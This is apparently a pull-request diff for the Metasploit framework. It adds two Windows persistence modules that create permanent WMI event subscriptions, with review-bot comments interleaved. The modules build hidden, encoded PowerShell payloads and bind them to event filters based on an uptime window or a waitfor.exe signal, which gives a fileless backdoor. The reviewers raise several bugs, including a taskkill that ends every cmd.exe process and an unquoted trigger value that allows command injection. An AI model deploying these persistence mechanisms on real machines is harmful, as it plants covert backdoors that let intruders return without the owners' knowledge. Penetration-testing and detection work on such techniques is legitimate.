+ OptString.new('CUSTOM_PS_COMMAND',
+ [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]),
+ ]
+ )
+ end
+
+ def check
+ print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+ return CheckCode::Safe('This module requires powershell to run') unless have_powershell?
+
+ return CheckCode::Safe('This module requires admin privs to run') unless is_admin?
+
+ return CheckCode::Safe('This module cannot run as System') if is_system?
+
+ return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity?
+
+ uptime = windows_uptime
+ vprint_status("System uptime: #{uptime}s")
+ return CheckCode::Safe("SYSTEM_UPTIME_START (#{datastore['SYSTEM_UPTIME_START']}) is less than the current system uptime: #{uptime}") if uptime > datastore['SYSTEM_UPTIME_START']
+ return CheckCode::Safe("SYSTEM_UPTIME_START (#{datastore['SYSTEM_UPTIME_START']}) must be less than SYSTEM_UPTIME_END: #{datastore['SYSTEM_UPTIME_END']}") if datastore['SYSTEM_UPTIME_START'] > datastore['SYSTEM_UPTIME_END']
+
+ CheckCode::Appears('Likely exploitable')
+ end
+
+ def windows_uptime
+ # Run PowerShell to get boot time in WMI format
+ boot_time_str = cmd_exec('powershell -Command "(gcim Win32_OperatingSystem).LastBootUpTime | Out-String"').strip
+
+ # Try to parse PowerShell localized format (e.g. "Thursday, November 20, 2025 7:45:59 PM")
+ begin
+ boot_time = Time.parse(boot_time_str)
+ rescue ArgumentError
+ # Fallback: try WMI format like "20251120194559.500000-300"
+ if boot_time_str =~ /^(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})\.\d+\s*([+-]\d{3})?/
+ year = ::Regexp.last_match(1)
+ month = ::Regexp.last_match(2)
+ day = ::Regexp.last_match(3)
+ hour = ::Regexp.last_match(4)
+ min = ::Regexp.last_match(5)
+ sec = ::Regexp.last_match(6)
+ tz_offset = ::Regexp.last_match(7)
+ offset_hours = (tz_offset.to_i / 60)
+ offset = format('%+03d:00', offset_hours)
+ boot_time = Time.new(year, month, day, hour, min, sec, offset)
+ else
+ vprint_error("Unable to parse boot time: #{boot_time_str.inspect}")
+ return 0
+ end
+ end
+
+ (Time.now - boot_time).round
+ end
+
+ def install_persistence
+ print_status('Installing Persistence...')
+
+ psh_exec(subscription_logon)
+ print_good 'Persistence installed!'
+ # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell
+ # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+ name_class = datastore['CLASSNAME']
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ end
+
+ def build_payload
+ if datastore['CUSTOM_PS_COMMAND']
+ script_in = datastore['CUSTOM_PS_COMMAND']
+ compressed_script = compress_script(script_in)
+ encoded_script = encode_script(compressed_script)
+ generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)
+ else
+ cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+ end
+ end
+
+ def subscription_logon
+ command = build_payload
+ class_name = 
datastore['CLASSNAME']
+ <<-HEREDOC
+ $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= #{datastore['SYSTEM_UPTIME_START']} AND TargetInstance.SystemUpTime < #{datastore['SYSTEM_UPTIME_END']}\"; QueryLanguage = 'WQL'}
+ $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+ HEREDOC
+ end
+end
diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb
new file mode 100644
index 0000000000000..629276c077730
--- /dev/null
+++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb
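Review bot: `windows_uptime` in wmi_event_subscription_uptime.rb subtracts a boot time reported by the target from `Time.now` on the framework host, so any clock skew or time-zone difference between the two machines shifts the result, and `Time.parse` reads the localized `Out-String` text as if it were in the host's zone. When parsing fails it returns 0, so `check` passes the `uptime > SYSTEM_UPTIME_START` test and reports `Appears` although the uptime is unknown. Having the target compute the number of seconds itself and returning `CheckCode::Unknown` when no number comes back removes both problems, as sketched below. The window comparison should also be `>=`, because equal START and END values are accepted today while the WQL filter (`>= START AND < END`) can then never match.

```ruby
  def check
    # … unchanged: powershell, admin, SYSTEM and integrity checks …
    uptime = windows_uptime
    return CheckCode::Unknown('Unable to determine the system uptime') if uptime.nil?

    vprint_status("System uptime: #{uptime}s")
    # … unchanged: comparison of uptime with SYSTEM_UPTIME_START …
    return CheckCode::Safe("SYSTEM_UPTIME_START (#{datastore['SYSTEM_UPTIME_START']}) must be less than SYSTEM_UPTIME_END: #{datastore['SYSTEM_UPTIME_END']}") if datastore['SYSTEM_UPTIME_START'] >= datastore['SYSTEM_UPTIME_END']
    # … unchanged: CheckCode::Appears result …

  # Uptime in whole seconds as computed on the target itself, or nil when it cannot be read.
  def windows_uptime
    output = cmd_exec('powershell -Command "[int]((Get-Date) - (gcim Win32_OperatingSystem).LastBootUpTime).TotalSeconds"').to_s.strip
    return output.to_i if output.match?(/\A\d+\z/)

    vprint_error("Unable to read system uptime: #{output.inspect}")
    nil
  end
```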
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::Windows::Powershell
+ include Msf::Exploit::Powershell
+ include Post::Windows::Priv
+ include Msf::Post::File
+ include Msf::Exploit::Local::Persistence
+ include Msf::Exploit::Deprecated
+ moved_from 'exploits/windows/local/wmi_persistence'
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'WMI Event Subscription Waitfor Persistence',
+ 'Description' => %q{
+ This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter that utilizes
+ the Microsoft binary waitfor.exe to wait for a signal specified
+ by WAITFOR_TRIGGER before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command
+ (note: requires target to have port 445 open).
+
+ Additionally a custom command can be specified to run once the trigger is
+ activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+ high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+ },
+ 'Author' => [
+ 'Nick Tyrer <@NickTyrer>', # original module
+ 'h00die' # docs, persistence mixin, pshell cleanup
+ ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'SessionTypes' => ['meterpreter'],
+ 'Targets' => [['Windows', {}]],
+ 'DisclosureDate' => '2017-06-06',
+ 'DefaultTarget' => 0,
+ 'References' => [
+ ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+ ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'],
+ ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION]
+ ],
+ 'Notes' => {
+ 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('WAITFOR_TRIGGER',
+ [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]),
+ OptString.new('CLASSNAME',
+ [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+ ])
+
+ register_advanced_options(
+ [
+ OptString.new('CUSTOM_PS_COMMAND',
+ [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]),
+ ]
+ )
+ end
+
+ def check
+ print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+ return CheckCode::Safe('This module requires powershell to run') unless have_powershell?
+
+ return CheckCode::Safe('This module requires admin privs to run') unless is_admin?
+
+ return CheckCode::Safe('This module cannot run as System') if is_system?
+
+ return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity?
+
+ CheckCode::Appears('Likely exploitable')
+ end
+
+ def install_persistence
+ host = session.session_host
+ print_status('Installing Persistence...')
+ psh_exec(subscription_waitfor)
+ print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI #{datastore['WAITFOR_TRIGGER']}\""
+ # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell
+ # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+ # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+ name_class = datastore['CLASSNAME']
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='Telemetrics'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE 
Name='Telemetrics'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n"
+ end
+
+ def build_payload
+ if datastore['CUSTOM_PS_COMMAND']
+ script_in = datastore['CUSTOM_PS_COMMAND']
+ compressed_script = compress_script(script_in)
+ encoded_script = encode_script(compressed_script)
+ generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)
+ else
+ cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+ end
+ end
+
+ def subscription_waitfor
+ command = build_payload
+ word = datastore['WAITFOR_TRIGGER']
+ class_name = datastore['CLASSNAME']
+ <<-HEREDOC
+ $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\"; QueryLanguage = 'WQL'}
+ $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; 
CommandLineTemplate = \"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\"}
+ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+ $Filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
+ $Consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"}
+ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}
+ Start-Process -FilePath waitfor.exe #{word} -NoNewWindow
+ HEREDOC
+ end
+end
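Review bot: The consumer's `CommandLineTemplate` in `subscription_waitfor` ends with `taskkill /F /IM cmd.exe`, which force-terminates every cmd.exe process on the host rather than only the one this consumer started, while the module's Notes declare `CRASH_SAFE` and list no such side effect. That can end unrelated user or service shells on the system under test, so it should be removed or at least called out, e.g. with `# NOTE: taskkill /IM cmd.exe ends all cmd.exe processes on the host, not only ours` and a matching line in the module documentation. `WAITFOR_TRIGGER` is also interpolated unquoted into three command lines, so a value containing spaces or `&` changes what runs; a guard such as `fail_with(Failure::BadConfig, 'WAITFOR_TRIGGER must be a single word') unless datastore['WAITFOR_TRIGGER'].match?(/\A\w+\z/)` keeps it to one token. The second filter and consumer use the fixed name `Telemetrics` with hard-coded 240/325 uptime bounds, which collides when the module is installed twice; deriving that name from `CLASSNAME` would keep the cleanup unambiguous.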